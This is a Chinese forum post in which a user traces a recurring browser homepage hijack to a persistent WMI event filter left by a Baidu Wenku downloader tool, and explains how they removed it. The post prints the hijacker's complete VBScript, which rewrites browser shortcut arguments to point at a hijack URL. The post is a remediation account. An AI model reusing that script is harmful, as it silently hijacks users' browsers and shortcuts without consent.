大贤者
精华
|
战斗力 鹅
|
回帖 0
注册时间 2012-12-17
|
前几天在远景下了一个百度文库下载工具,运行时想看看有没有被流氓做手脚,果不其然点设置弹出一个“是否将hao123设为主页”的对话框,果断点了关闭。
然而次日开机后打开Firefox发现主页变成hao123了 ,从开始菜单启动IE发现没有类似问题,在Firefox浏览器设置里没发现改动的痕迹,检查快捷方式发现目标"C:\Program Files\Mozilla Firefox\firefox.exe"后缀添加了http://hk.jtsh123.com/,于是从安装目录直接启动程序发现没问题,就重新建了个快捷方式,并把那个百度文库下载工具卸载了。
结果今天开机发现主页又被改回hao123 ,于是在网上搜索了一下,方法不外乎那几种:
1、在快捷方式后添加想要设置的主页链接。然而这样治标不治本;
2、修改配置文件夹里的“user.js”文件。然而并没有这文件;
3、在注册表里搜索包含http://hk.jtsh123.com/的条目并修改。然而搜了半天还没搜出来只好作罢;
4、其他诸如重置Firefox、安装360、魔方等软件修复并没有尝试。
后来远景论坛有人说需通过WMI工具修改,然而微软官网下载这软件的页面已经没了,在其他网站找了几个,大多数运行程序看起来都很可疑的样子,好在终于找到一个正常的,安装后参照贴吧这个帖子http://tieba.baidu.com/p/4558542403,并没有找到_EventFilter:Name="unown_filter这项,进入_EventFilter:Name="SCM Event Log Filter"在ScriptText项发现如下字段:
On Error Resume Next:Const link = "http://hk.jtsh123.com/":Const link360 = "http://hk.jtsh123.com/s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Niclas\Desktop,C:\Users\Niclas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Niclas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Niclas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Niclas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
直接在Value那栏置位或删除后重新打开字段依旧还在,只能删掉整个_EventFilter:Name="SCM Event Log Filter"项目,顺便把以上文本涉及到的路径全部排查删除了一遍,重启后暂时没出现这问题了。
本以为只是一个简单的问题,没想到花了我半天时间 ,难道真的要装个安全防护软件?顺便问问有没有靠谱干净的百度文库下载工具。
|
|
沪公网安备 31010702007642号 )
发表于 2016-10-6 12:01
